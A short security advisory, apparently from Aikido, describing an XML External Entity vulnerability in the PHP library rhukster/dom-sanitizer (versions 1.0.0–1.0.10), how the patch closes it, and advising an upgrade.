AIKIDO-2026-10552
rhukster/dom-sanitizer is vulnerable to XML External Entity (XXE)
75
High Risk
This Affects:
rhukster/dom-sanitizerTL;DR
The sanitizer loads untrusted SVG, HTML, or MathML with loadDocument through loadXML or loadHTML. Before the change, the parser could process document types and entity declarations and resolve external entities where the platform allows it, which can lead to local file or network fetches and to entity expansion that exhausts memory. The update strips doctype and entity declaration syntax from the string before parsing, passes LIBXML_NONET so the load path cannot open remote DTDs or resources, and on older PHP runtime versions temporarily disables Libxml’s external entity loader around the parse.
Who does this affect?
You are affected if you are using a version that falls within the vulnerable range.
Background info
rhukster/dom-sanitizer is vulnerable to XML External Entity (XXE) in versions 1.0.0 - 1.0.10.
How to fix this
Upgrade the rhukster/dom-sanitizer library to the patch version.
Are You Affected?
Connect your repositories to instantly see whether vulnerable or malicious packages exist in your codebase.
Free. No credit card required.
SOC 2Compliant
ISO 27001Compliant